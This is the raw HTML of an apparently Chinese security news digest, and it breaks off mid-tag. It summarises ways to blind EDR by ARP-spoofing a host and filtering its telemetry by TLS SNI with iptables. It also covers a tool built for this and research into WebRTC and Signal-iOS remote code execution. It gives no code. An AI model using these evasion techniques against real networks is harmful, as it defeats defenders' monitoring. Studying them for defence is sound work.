	<img class="rich_pages wxw-img" data-ratio="0.24967824967824967" data-w="777" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=756003ce&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46iauiaGpkRPB2bRmjxPvNhtcahD87Y2nicyL3ibEfXvoPhloLZ1RaOrWwyg%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="1.0153256704980842" data-w="522" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=69718181&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46Y6FY6x4RqeIKyzPDT0M5kgv28g5icb5aeVXzmJUC3jnInr4gibrTYRWg%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">「编者注」:致盲edr的一个操作，日志链路阻断, 实战里有很多类似的举一反三.</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">绕过EDR控制台的有趣方法</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46qGcYSz7ciap3qyYDr1ZzxOU6V4SZQGzNdLXWBQFXYVnbvrfC2oLoAjw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46qGcYSz7ciap3qyYDr1ZzxOU6V4SZQGzNdLXWBQFXYVnbvrfC2oLoAjw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5122484884541544"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">ARP欺骗是实施PitM攻击的有效方法，可以用来拦截和过滤EDR遥测数据包。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">传统的<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">iptables</code>规则，基于IP地址或子网来阻断流量，对于大量的EDR通信服务器地址来说是不够高效的。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">利用TLS握手中的SNI可以更精确地识别EDR遥测流量，并通过更新<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">iptables</code>规则来有效地阻断这些流量。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;"><code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">edr_blocker.py</code>工具提供了一个更高效的解决方案，能够解析TLS握手中的SNI并动态更新<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">iptables</code>规则。</section></li></ul>
	<br/>
	<p>🏷️: EDR, 中间人攻击, ARP中毒, iptables, TLS</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x02
			 EDR遥测数据拦截器</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">EDR Telemetry Blocker 是一个通过进行人在中间（Person-in-the-Middle）攻击并使用 iptables 进行网络过滤来阻止终端防御（EDR）遥测的工具。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=e31deaf1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmwZuG4Yf5KAoarDAr2Ip460gMvvW0vfrjMFBniakJzk7Zfx2kumO6Tr7o2IJcV1NT3N62dp6aqoTg%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过PitM网络过滤阻止EDR遥测</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">EDR Blocker：利用 ARP 欺骗执行中间人攻击的工具</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46bliadhicTXka4qdJEib9gRa3icId4Hhj6532kQkibeqk2ic7RJmFJpxS28bg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46bliadhicTXka4qdJEib9gRa3icId4Hhj6532kQkibeqk2ic7RJmFJpxS28bg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8855414114415882"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">EDR Telemetry Blocker 工具通过中间人攻击和 iptables 过滤来阻断 EDR 遥测数据。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">该工具可以在监控模式下仅检测和日志记录被阻断的 IP 地址，而不会添加 iptables 规则。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">工具的使用需要指定网络接口、被阻止服务器名称列表文件、目标 IP 地址或范围以及网关 IP 地址。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">工具支持详细输出，便于用户了解工具的运行情况。</section></li></ul>
	<br/>
	<p>🏷️: EDR, iptables, 网络安全, 中间人攻击</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x03
			 WebRTC安全漏洞研究：远程代码执行风险</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本文介绍了如何通过研究和利用 WebRTC 和 Signal-iOS 的漏洞来实现远程代码执行（RCE）。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.6787037037037037" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=50184ef7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46kFv2Qsk3tacXrOXkjd8FZMQeMFicNQJuw63soh07lM0siaJeFzkgfVpA%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.5571725571725572" data-w="962" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=6af68e16&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46XhTK7LowQPDQK5dX6O5Lrf3CtnuPCoYcBvicgCgicZj6OkwyN1AQS48Q%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: 